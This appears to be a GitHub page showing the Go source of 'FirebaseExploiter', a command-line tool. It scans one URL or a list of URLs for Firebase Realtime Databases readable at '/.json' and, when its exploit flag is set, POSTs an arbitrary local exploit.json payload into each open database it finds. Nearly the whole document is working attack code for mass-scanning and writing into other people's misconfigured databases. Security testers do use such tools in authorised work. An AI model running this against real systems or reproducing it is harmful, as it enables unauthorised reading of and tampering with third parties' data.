-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy pathfirebaseExploiter.go
112 lines (104 loc) · 2.9 KB
/
firebaseExploiter.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
package main
import (
"bufio"
"encoding/json"
"errors"
"flag"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"github.com/fatih/color"
)
const banner = `
____ ___ _
/ __/ ___ ____ __ __ ____ ___ / _ ) (_) ___ ___ _ ____ __ __
_\ \ / -_)/ __// // / / __// -_) / _ | / / / _ \/ _ / / __/ / // /
/___/ \__/ \__/ \_,_/ /_/ \__/ /____/ /_/ /_//_/\_,_/ /_/ \_, /
/___/
FirebaseExploiter v1.0
`
func checkJSON(url string, cmd string, exploit bool, path string) {
startsWith := strings.HasPrefix(url, "https://")
if !startsWith {
url = "https://" + url
}
endsWith := strings.HasSuffix(url, "/")
if !endsWith {
url += "/"
}
resp, err := http.Get(url + ".json")
if err != nil {
color.Yellow("[-] Failed to connect " + url)
}
if err == nil {
if resp.StatusCode == 200 {
color.Red("[+] " + url + " - Firebase Possibly Vulnerable")
if exploit {
exploitJSON(url, path)
}
}
if (resp.StatusCode != 200) && (cmd == "standalone") {
color.Yellow("[*] " + url + " - Firebase Not Vulnerable")
}
}
}
func isJSON(s string) bool {
var js interface{}
return json.Unmarshal([]byte(s), &js) == nil
}
func exploitJSON(url string, path string) {
_, err := os.Stat("exploit.json")
if errors.Is(err, os.ErrNotExist) {
color.Yellow("[-] File 'exploit.json' does not exist")
os.Exit(-1)
} else {
fileContent, err := ioutil.ReadFile("exploit.json")
if err != nil {
color.Yellow("[-] Error reading file 'exploit.json'")
}
str := string(fileContent)
if !isJSON(str) {
color.Yellow("[-] File 'exploit.json' is not in proper JSON format")
}
resp, err := http.Post(url+path+".json", "application/json", strings.NewReader(str))
if err != nil {
color.Yellow("[-] Failed to exploit " + url + path + ".json")
}
if err == nil {
if resp.StatusCode == 200 {
color.Green("[+] Exploited URL - " + url + path + ".json")
} else {
color.Yellow("[*] Exploited Failed For - " + url + path + ".json")
}
}
}
}
func main() {
url := flag.String("url", "", "Target URL")
file := flag.String("file", "", "File Path")
exploit := flag.Bool("exploit", false, "Exploit")
path := flag.String("path", "firebaseExploiter", "URI Path For Exploit")
flag.Parse()
fmt.Println(banner)
if *url == "" && *file == "" {
flag.PrintDefaults()
os.Exit(-1)
}
if *url != "" {
checkJSON(*url, "standalone", *exploit, *path)
}
if *url == "" && *file != "" {
readFile, err := os.Open(*file)
if err != nil {
fmt.Println(err)
}
fileScanner := bufio.NewScanner(readFile)
fileScanner.Split(bufio.ScanLines)
for fileScanner.Scan() {
checkJSON(fileScanner.Text(), "file", *exploit, *path)
}
readFile.Close()
}
}